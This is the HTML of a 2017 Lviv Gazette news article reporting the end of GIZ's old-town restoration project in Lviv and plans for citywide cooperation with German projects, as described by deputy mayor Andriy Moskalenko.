<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=1280">
    <title>...з німецькими проектами, які допоможуть розвивати усе місто -Моск...</title>
	<link rel="icon" href="http://gazeta.lviv.ua/wp-content/themes/gazeta/favicon.ico" type="image/x-icon"></link> 
	<link rel="shortcut icon" href="http://gazeta.lviv.ua/wp-content/themes/gazeta/favicon.ico" type="image/x-icon"></link>
	
<!-- This site is optimized with the Yoast SEO plugin v5.3.3 - https://yoast.com/wordpress/plugins/seo/ -->
<meta name="description" content="У рамках проекту у центральній частині міста відреставрували 113 брам та дверей, 586 вікон, 61 балкон та 16 внутрішніх дворів"/>
<link rel="canonical" href="http://gazeta.lviv.ua/2017/11/28/lviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko/" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="У рамках проекту у центральній частині міста відреставрували 113 брам та дверей, 586 вікон, 61 балкон та 16 внутрішніх дворів" />
<meta name="twitter:title" content="...з німецькими проектами, які допоможуть розвивати усе місто -Моск..." />
<meta name="twitter:image" content="http://gazeta.lviv.ua/wp-content/uploads/2017/11/17845337_303.jpg" />
<script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"http:\/\/gazeta.lviv.ua\/","name":"\u041d\u0430\u0439\u0441\u0432\u0456\u0436\u0456\u0448\u0456 \u043d\u043e\u0432\u0438\u043d\u0438 \u043c\u0456\u0441\u0442\u0430 \u041b\u044c\u0432\u043e\u0432\u0430 \u0442\u0430 \u0423\u043a\u0440\u0430\u0457\u043d\u0438 \u0432 \u0440\u0435\u0436\u0438\u043c\u0456 \u043e\u043d\u043b\u0430\u0439\u043d - \u041b\u044c\u0432\u0456\u0432\u0441\u044c\u043a\u0430 \u0433\u0430\u0437\u0435\u0442\u0430","alternateName":"\u041b\u044c\u0432\u0456\u0432\u0441\u044c\u043a\u0456 \u043d\u043e\u0432\u0438\u043d\u0438 \u0449\u043e\u0445\u0432\u0438\u043b\u0438\u043d\u0438. \u041e\u0441\u0442\u0430\u043d\u043d\u0456 \u043d\u043e\u0432\u0438\u043d\u0438 \u043f\u043e\u043b\u0456\u0442\u0438\u043a\u0438, \u0435\u043a\u043e\u043d\u043e\u043c\u0456\u043a\u0438, \u0441\u043f\u043e\u0440\u0442\u0443 \u0442\u0430 \u043a\u0443\u043b\u044c\u0442\u0443\u0440\u0438. \u041b\u044c\u0432\u0456\u0432\u0441\u044c\u043a\u0430 \u0433\u0430\u0437\u0435\u0442\u0430 \u043e\u043d\u043b\u0430\u0439\u043d","potentialAction":{"@type":"SearchAction","target":"http:\/\/gazeta.lviv.ua\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//s.gravatar.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Львівська газета &raquo; Львів співпрацюватиме з німецькими проектами, які  допоможуть розвивати усе місто,- Москаленко Канал коментарів" href="http://gazeta.lviv.ua/2017/11/28/lviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/gazeta.lviv.ua\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.3"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,56826,8203,55356,56819),0,0),c=j.toDataURL(),b!==c&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55358,56794,8205,9794,65039),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55358,56794,8203,9794,65039),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='realmodals-css'  href='http://gazeta.lviv.ua/wp-content/plugins/real-kit/modules/modals/style.css?ver=4.8.3' type='text/css' media='all' />
<link rel='stylesheet' id='archives-cal-calendrier-css'  href='http://gazeta.lviv.ua/wp-content/plugins/archives-calendar-widget/themes/calendrier.css?ver=1.0.12' type='text/css' media='all' />
<link rel='stylesheet' id='wp-pagenavi-css'  href='http://gazeta.lviv.ua/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<link rel='stylesheet' id='fonts-css'  href='https://fonts.googleapis.com/css?family=Fira+Sans%3A400%2C400i%2C500%2C500i%2C700%2C700i%7COpen+Sans%3A400%2C400i%2C700%2C700i%7CPT+Sans%3A400%2C400i%2C700%2C700i%7CPT+Serif%3A400%2C400i%2C700%2C700i&#038;ver=4.8.3' type='text/css' media='all' />
<link rel='stylesheet' id='awesome-css'  href='http://gazeta.lviv.ua/wp-content/themes/gazeta/css/font-awesome.min.css?ver=4.8.3' type='text/css' media='all' />
<link rel='stylesheet' id='theme-style-css'  href='http://gazeta.lviv.ua/wp-content/themes/gazeta/style.css?ver=4.8.3' type='text/css' media='all' />
<link rel='stylesheet' id='gk-nsp-css'  href='http://gazeta.lviv.ua/wp-content/plugins/gk-nsp/gk-nsp.css?ver=4.8.3' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://gazeta.lviv.ua/wp-includes/css/dashicons.min.css?ver=4.8.3' type='text/css' media='all' />
<link rel='stylesheet' id='thickbox-css'  href='http://gazeta.lviv.ua/wp-includes/js/thickbox/thickbox.css?ver=4.8.3' type='text/css' media='all' />
<link rel='stylesheet' id='et-builder-modules-style-css'  href='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/styles/frontend-builder-plugin-style.css?ver=1.2.3' type='text/css' media='all' />
<link rel='stylesheet' id='magnific-popup-css'  href='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/styles/magnific_popup.css?ver=1.2.3' type='text/css' media='all' />
<link rel='stylesheet' id='A2A_SHARE_SAVE-css'  href='http://gazeta.lviv.ua/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.14' type='text/css' media='all' />
<link rel='stylesheet' id='fancybox-css'  href='http://gazeta.lviv.ua/wp-content/plugins/easy-fancybox/fancybox/jquery.fancybox-1.3.8.min.css?ver=1.6' type='text/css' media='screen' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://gazeta.lviv.ua/wp-content/plugins/jetpack/css/jetpack.css?ver=5.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/real-kit/modules/modals/script.js?ver=4.8.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.0'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/archives-calendar-widget/admin/js/jquery.arcw-init.js?ver=1.0.12'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/themes/gazeta/js/jquery.cycle.js?ver=4.8.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/themes/gazeta/js/theme-script.js?ver=4.8.3'></script>
<link rel='https://api.w.org/' href='http://gazeta.lviv.ua/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://gazeta.lviv.ua/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://gazeta.lviv.ua/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.8.3" />
<link rel='shortlink' href='http://wp.me/p874c2-Hce' />
<link rel="alternate" type="application/json+oembed" href="http://gazeta.lviv.ua/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F11%2F28%2Flviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://gazeta.lviv.ua/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F11%2F28%2Flviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko%2F&#038;format=xml" />

<script type="text/javascript">
var a2a_config=a2a_config||{};a2a_config.callbacks=a2a_config.callbacks||[];a2a_config.templates=a2a_config.templates||{};a2a_localize = {
	Share: "Share",
	Save: "Save",
	Subscribe: "Subscribe",
	Email: "Email",
	Bookmark: "Bookmark",
	ShowAll: "Show all",
	ShowLess: "Show less",
	FindServices: "Find service(s)",
	FindAnyServiceToAddTo: "Instantly find any service to add to",
	PoweredBy: "Powered by",
	ShareViaEmail: "Share via email",
	SubscribeViaEmail: "Subscribe via email",
	BookmarkInYourBrowser: "Bookmark in your browser",
	BookmarkInstructions: "Press Ctrl+D or \u2318+D to bookmark this page",
	AddToYourFavorites: "Add to your favorites",
	SendFromWebOrProgram: "Send from any email address or email program",
	EmailProgram: "Email program",
	More: "More&#8230;"
};

</script>
<script type="text/javascript" src="https://static.addtoany.com/menu/page.js" async="async"></script>
<meta property="fb:app_id" content="1083471841726549"/>
<link rel='dns-prefetch' href='//v0.wordpress.com'>
<style type='text/css'>img#wpstats{display:none}</style><link rel="amphtml" href="http://gazeta.lviv.ua/2017/11/28/lviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko/amp/" />
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Львів співпрацюватиме з німецькими проектами, які  допоможуть розвивати усе місто,- Москаленко" />
<meta property="og:url" content="http://gazeta.lviv.ua/2017/11/28/lviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko/" />
<meta property="og:description" content="Свою восьмирічну роботу, яка тривала лише у старій частині Львова, GIZ завершить до кінця цього року" />
<meta property="article:published_time" content="2017-11-28T15:15:40+00:00" />
<meta property="article:modified_time" content="2017-11-28T14:35:00+00:00" />
<meta property="og:site_name" content="Львівська газета" />
<meta property="og:image" content="http://gazeta.lviv.ua/wp-content/uploads/2017/11/17845337_303.jpg" />
<meta property="og:image:width" content="700" />
<meta property="og:image:height" content="394" />
<meta property="og:locale" content="uk_UA" />
<meta name="twitter:image" content="http://gazeta.lviv.ua/wp-content/uploads/2017/11/17845337_303.jpg?w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- Easy FancyBox 1.6 using FancyBox 1.3.8 - RavanH (http://status301.net/wordpress-plugins/easy-fancybox/) -->
<script type="text/javascript">
/* <![CDATA[ */
var fb_timeout = null;
var fb_opts = { 'overlayShow' : true, 'hideOnOverlayClick' : true, 'showCloseButton' : true, 'margin' : 20, 'centerOnScroll' : true, 'enableEscapeButton' : true, 'autoScale' : true };
var easy_fancybox_handler = function(){
	/* IMG */
	var fb_IMG_select = 'a[href*=".jpg"]:not(.nolightbox,li.nolightbox>a), area[href*=".jpg"]:not(.nolightbox), a[href*=".jpeg"]:not(.nolightbox,li.nolightbox>a), area[href*=".jpeg"]:not(.nolightbox), a[href*=".png"]:not(.nolightbox,li.nolightbox>a), area[href*=".png"]:not(.nolightbox), a[href*=".webp"]:not(.nolightbox,li.nolightbox>a), area[href*=".webp"]:not(.nolightbox)';
	jQuery(fb_IMG_select).addClass('fancybox image');
	var fb_IMG_sections = jQuery('div.gallery ');
	fb_IMG_sections.each(function() { jQuery(this).find(fb_IMG_select).attr('rel', 'gallery-' + fb_IMG_sections.index(this)); });
	jQuery('a.fancybox, area.fancybox, li.fancybox a').fancybox( jQuery.extend({}, fb_opts, { 'transitionIn' : 'elastic', 'easingIn' : 'easeOutBack', 'transitionOut' : 'elastic', 'easingOut' : 'easeInBack', 'opacity' : false, 'hideOnContentClick' : false, 'titleShow' : true, 'titlePosition' : 'over', 'titleFromAlt' : true, 'showNavArrows' : true, 'enableKeyboardNav' : true, 'cyclic' : false }) );
}
var easy_fancybox_auto = function(){
	/* Auto-click */
	setTimeout(function(){jQuery('#fancybox-auto').trigger('click')},1000);
}
/* ]]> */
</script>
	



</head>
<body  class="post-template-default single single-post postid-166050 single-format-standard  et_divi_builder"> 


<script>
        (function (i, s, o, g, r, a, m) {
            i['GoogleAnalyticsObject'] = r;
            i[r] = i[r] || function () {
                (i[r].q = i[r].q || []).push(arguments)
            }, i[r].l = 1 * new Date();
            a = s.createElement(o),
                    m = s.getElementsByTagName(o)[0];
            a.async = 1;
            a.src = g;
            m.parentNode.insertBefore(a, m)
        })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');

        ga('create', 'UA-75408624-1', 'auto');
        ga('send', 'pageview');

    </script>

	<div id="wrapper">
        <header id="header">
        	<div class="center">
            	<div class="header-panel clearfix">
                	                    <div class="top-slides">
                    	<ul id="top-slides-list">
                        	                            <li>
                            	                                <a href="http://gazeta.lviv.ua/2017/11/28/minuloyi-dobi-leleki-prinesli-u-lvivski-rodini-32-nemovlyat/">
                                                                	<span class="thumb"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/11/parens_1-1024x585-1-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></span>
                                    <span class="caption"><span class="cell">Минулої доби лелеки принесли у львівські родини 32 немовлят</span></span>
								                                </a>
                                                            </li>
                                                    </ul>
                    </div>
                                        <div class="header-panel-right">
                    	                        <ul class="header-socials">
                        	<li class="mobile-swatch"><a href="/2017/11/28/lviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko/?mobile_switch=mobile" title="Версія для мобільних"><i class="fa fa-mobile"></i></a></li>
							<li><a href="http://facebook.com/lvivskagazeta/" target="_blank"><i class="fa fa-facebook"></i></a></li>                                                        <li><a href="https://www.youtube.com/channel/UCJiKZoY0vRxONsAgIuzNcuQ" target="_blank"><i class="fa fa-youtube-play"></i></a></li>                                                        <li><a href="http://gazeta.lviv.ua/feed/" target="_blank"><i class="fa fa-feed"></i></a></li>                        </ul>
                        <div class="header-radio"><aside id="custom_html-2" class="widget_text all-devices  widget_custom_html"><div class="textwidget custom-html-widget"><a href="http://www.galychyna.fm/" target="_blank"><img src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/galychyna.jpg" alt="FM Галичина"></a></div></aside></div>
                    </div>
                    <div class="logo_block">
                		                    	<a id="logo" href="http://gazeta.lviv.ua" title="Львівська газета"><img src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/logo.png" alt="Львівська газета"></a>
                	</div>
                </div><!-- end header-panel -->
                <div class="header-main">
                	<div class="gray-row clearfix">
                    	<ul id="menu-main-menu" class="main_menu"><li id="menu-item-160249" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-160249"><a href="http://gazeta.lviv.ua/"><i class="fa fa-home"></i></a></li>
<li id="menu-item-239" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-239"><a href="http://gazeta.lviv.ua/novini/">Новини</a></li>
<li id="menu-item-160269" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160269"><a href="http://gazeta.lviv.ua/interview/">Інтерв&#8217;ю</a></li>
<li id="menu-item-160270" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160270"><a href="http://gazeta.lviv.ua/specprojects/">Спецпроекти</a></li>
<li id="menu-item-242" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-242"><a href="http://gazeta.lviv.ua/foto/">Фото-відео</a></li>
<li id="menu-item-130196" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-130196"><a href="http://gazeta.lviv.ua/blogi/">Блоги</a></li>
</ul>                        <div class="header-search"><div class="search-block">
    <form method="get" id="searchform" action="http://gazeta.lviv.ua/">
        <input type="text" class="input-search" placeholder="Пошук" name="s" id="s" value="" />
        <button type="submit" class="submit-search" name="submit" id="searchsubmit"><i class="fa fa-search"></i></button>
    </form>
</div></div>
                    </div>
                    <div class="white-row clearfix">
                    	<ul id="menu-news-menu" class="news_menu"><li id="menu-item-160318" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160318"><a href="http://gazeta.lviv.ua/politika-2/">Політика</a></li>
<li id="menu-item-160250" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160250"><a href="http://gazeta.lviv.ua/ekonomika-2/">Бізнес</a></li>
<li id="menu-item-160254" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160254"><a href="http://gazeta.lviv.ua/novini/suspilstvo/">Суспільство</a></li>
<li id="menu-item-160251" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160251"><a href="http://gazeta.lviv.ua/kultura/">Культура</a></li>
<li id="menu-item-160252" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160252"><a href="http://gazeta.lviv.ua/lyudi-lvova/">Люди Львова</a></li>
<li id="menu-item-160273" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160273"><a href="http://gazeta.lviv.ua/stil-zhittya/">Стиль життя</a></li>
</ul>                        <div class="header-weather">

                            <div class="weather-date">28 листопада 2017</div>
                            <div id="gsInformerID-ghJYhjkE8h5tGb" class="gsInformer" style="width:173px;height:87px">
                              <div class="city">у Львові</div>
                              <div class="gsIContent">
                                <div id="cityLink">
                                    <a href="https://www.gismeteo.ua/ua/weather-lviv-4949/" title="Погода у Львові" target="_blank">
                                        <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода у Львові">
                                    </a>
                                </div>
                                <div class="gsLinks" style="display:none;"></div>
                              </div>
                            </div>
                            <script src="https://www.gismeteo.ua/ajax/getInformer/?hash=ghJYhjkE8h5tGb" type="text/javascript"></script>
                        </div>
                    </div>
                </div><!-- end header-main -->
            </div>
       	</header>
        <div class="center">
        	<div class="header-ads-wrap"></div><!-- end header-ads-wrap -->
        </div>
		<div id="container">  
        	            <div class="center">
            
	<div class="content_section gray-border clearfix">
        <div class="column_main">
            <div class="column_center">
                				<div class="single-content">
                    <div class="post-header clearfix">
                        <h1>Львів співпрацюватиме з німецькими проектами, які  допоможуть розвивати усе місто,- Москаленко</h1>
<!--start-->
                                                <div class="subtitle">Свою восьмирічну роботу, яка тривала лише у старій частині Львова, GIZ завершить до кінця цього року</div>
                                                <div class="item-meta">
                            <time class="item-date" datetime="">17:15, Вт. - 28 Лис. 2017</time>
                            &nbsp;|&nbsp;
                            <span class="item-author"><a href="http://gazeta.lviv.ua/author/kurylo/">Марічка Курило</a></span>
                            &nbsp;<span class="item-views"><i class="fa fa-eye"></i> 165</span>
                            &nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/11/28/lviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko/"></span>
                        </div>
                        <div class="share-block"><div class="addtoany_shortcode"><div class="a2a_kit a2a_kit_size_24 addtoany_list" data-a2a-url="http://gazeta.lviv.ua/2017/11/28/lviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko/" data-a2a-title="Львів співпрацюватиме з німецькими проектами, які  допоможуть розвивати усе місто,- Москаленко"><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F11%2F28%2Flviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko%2F&amp;linkname=%D0%9B%D1%8C%D0%B2%D1%96%D0%B2%20%D1%81%D0%BF%D1%96%D0%B2%D0%BF%D1%80%D0%B0%D1%86%D1%8E%D0%B2%D0%B0%D1%82%D0%B8%D0%BC%D0%B5%20%D0%B7%20%D0%BD%D1%96%D0%BC%D0%B5%D1%86%D1%8C%D0%BA%D0%B8%D0%BC%D0%B8%20%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82%D0%B0%D0%BC%D0%B8%2C%20%D1%8F%D0%BA%D1%96%C2%A0%20%D0%B4%D0%BE%D0%BF%D0%BE%D0%BC%D0%BE%D0%B6%D1%83%D1%82%D1%8C%20%D1%80%D0%BE%D0%B7%D0%B2%D0%B8%D0%B2%D0%B0%D1%82%D0%B8%20%D1%83%D1%81%D0%B5%20%D0%BC%D1%96%D1%81%D1%82%D0%BE%2C-%20%D0%9C%D0%BE%D1%81%D0%BA%D0%B0%D0%BB%D0%B5%D0%BD%D0%BA%D0%BE" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F11%2F28%2Flviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko%2F&amp;linkname=%D0%9B%D1%8C%D0%B2%D1%96%D0%B2%20%D1%81%D0%BF%D1%96%D0%B2%D0%BF%D1%80%D0%B0%D1%86%D1%8E%D0%B2%D0%B0%D1%82%D0%B8%D0%BC%D0%B5%20%D0%B7%20%D0%BD%D1%96%D0%BC%D0%B5%D1%86%D1%8C%D0%BA%D0%B8%D0%BC%D0%B8%20%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82%D0%B0%D0%BC%D0%B8%2C%20%D1%8F%D0%BA%D1%96%C2%A0%20%D0%B4%D0%BE%D0%BF%D0%BE%D0%BC%D0%BE%D0%B6%D1%83%D1%82%D1%8C%20%D1%80%D0%BE%D0%B7%D0%B2%D0%B8%D0%B2%D0%B0%D1%82%D0%B8%20%D1%83%D1%81%D0%B5%20%D0%BC%D1%96%D1%81%D1%82%D0%BE%2C-%20%D0%9C%D0%BE%D1%81%D0%BA%D0%B0%D0%BB%D0%B5%D0%BD%D0%BA%D0%BE" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_google_plus" href="https://www.addtoany.com/add_to/google_plus?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F11%2F28%2Flviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko%2F&amp;linkname=%D0%9B%D1%8C%D0%B2%D1%96%D0%B2%20%D1%81%D0%BF%D1%96%D0%B2%D0%BF%D1%80%D0%B0%D1%86%D1%8E%D0%B2%D0%B0%D1%82%D0%B8%D0%BC%D0%B5%20%D0%B7%20%D0%BD%D1%96%D0%BC%D0%B5%D1%86%D1%8C%D0%BA%D0%B8%D0%BC%D0%B8%20%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82%D0%B0%D0%BC%D0%B8%2C%20%D1%8F%D0%BA%D1%96%C2%A0%20%D0%B4%D0%BE%D0%BF%D0%BE%D0%BC%D0%BE%D0%B6%D1%83%D1%82%D1%8C%20%D1%80%D0%BE%D0%B7%D0%B2%D0%B8%D0%B2%D0%B0%D1%82%D0%B8%20%D1%83%D1%81%D0%B5%20%D0%BC%D1%96%D1%81%D1%82%D0%BE%2C-%20%D0%9C%D0%BE%D1%81%D0%BA%D0%B0%D0%BB%D0%B5%D0%BD%D0%BA%D0%BE" title="Google+" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd a2a_counter addtoany_share_save" href="https://www.addtoany.com/share"></a></div></div></div>
                    </div>


							                            <div class="wp-caption">
                            	<a href="http://gazeta.lviv.ua/wp-content/uploads/2017/11/17845337_303.jpg"><img width="700" height="394" src="http://gazeta.lviv.ua/wp-content/uploads/2017/11/17845337_303.jpg" class="attachment-large size-large wp-post-image" alt="" srcset="http://gazeta.lviv.ua/wp-content/uploads/2017/11/17845337_303.jpg 700w, http://gazeta.lviv.ua/wp-content/uploads/2017/11/17845337_303-500x281.jpg 500w" sizes="(max-width: 700px) 100vw, 700px" /></a>
                                                                <p class="wp-caption-text">ФОТО: http://www.dw.com/en/giz-publication-database/a-18523127</p>
                                                            </div>
                            



                    <div class="single-ads-wrap"><aside class="all-devices  ads-widget gazet-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Банер в статті -->
<ins class="adsbygoogle"
     style="display:inline-block;width:468px;height:60px"
     data-ad-client="ca-pub-9951724072058821"
     data-ad-slot="4322344197"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></aside></div>
                    <div class="item-entry text">
					<p>Протягом восьми років у Львові працював проект GIZ – «Муніципальний розвиток та оновлення старої частини міста Львова». У рамках проекту у центральній частині міста відреставрували 113 брам та дверей, 586 вікон, 61 балкон та 16 внутрішніх дворів. З нового року Львів переходить у стадію кооперації з іншими проектами, розповів «Львівській Газеті» заступник міського голови з питань розвитку Андрій Москаленко:</p>
<p>«Як анонсує GIZ, Львів долучиться до нового проекту, який спрямований на, власне, інтегрований розвиток міст. Він буде стосуватись загалом усього міста, а не лише його центральної частини. У проекті враховуватиметься мобільність, зокрема, питання організації громадського транспорту. У межах українсько-німецької конференції з міського розвитку  визначать, які саме проекти будуть реалізовуватись».</p>
<p>Додамо, що  Другу українсько-німецьку конференцію з розвитку міст <a href="http://gazeta.lviv.ua/2017/11/28/zhitlo-transport-gromadski-prostori-u-lvovi-rozkazhut-yak-zrobiti-misto-komfortnim/">Львів прийме у п’ятницю</a>,  1 грудня. Перша така конференція відбулась минулого року у Києві.</p>
<div class="addtoany_share_save_container addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_24 addtoany_list" data-a2a-url="http://gazeta.lviv.ua/2017/11/28/lviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko/" data-a2a-title="Львів співпрацюватиме з німецькими проектами, які  допоможуть розвивати усе місто,- Москаленко"><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F11%2F28%2Flviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko%2F&amp;linkname=%D0%9B%D1%8C%D0%B2%D1%96%D0%B2%20%D1%81%D0%BF%D1%96%D0%B2%D0%BF%D1%80%D0%B0%D1%86%D1%8E%D0%B2%D0%B0%D1%82%D0%B8%D0%BC%D0%B5%20%D0%B7%20%D0%BD%D1%96%D0%BC%D0%B5%D1%86%D1%8C%D0%BA%D0%B8%D0%BC%D0%B8%20%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82%D0%B0%D0%BC%D0%B8%2C%20%D1%8F%D0%BA%D1%96%C2%A0%20%D0%B4%D0%BE%D0%BF%D0%BE%D0%BC%D0%BE%D0%B6%D1%83%D1%82%D1%8C%20%D1%80%D0%BE%D0%B7%D0%B2%D0%B8%D0%B2%D0%B0%D1%82%D0%B8%20%D1%83%D1%81%D0%B5%20%D0%BC%D1%96%D1%81%D1%82%D0%BE%2C-%20%D0%9C%D0%BE%D1%81%D0%BA%D0%B0%D0%BB%D0%B5%D0%BD%D0%BA%D0%BE" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter" 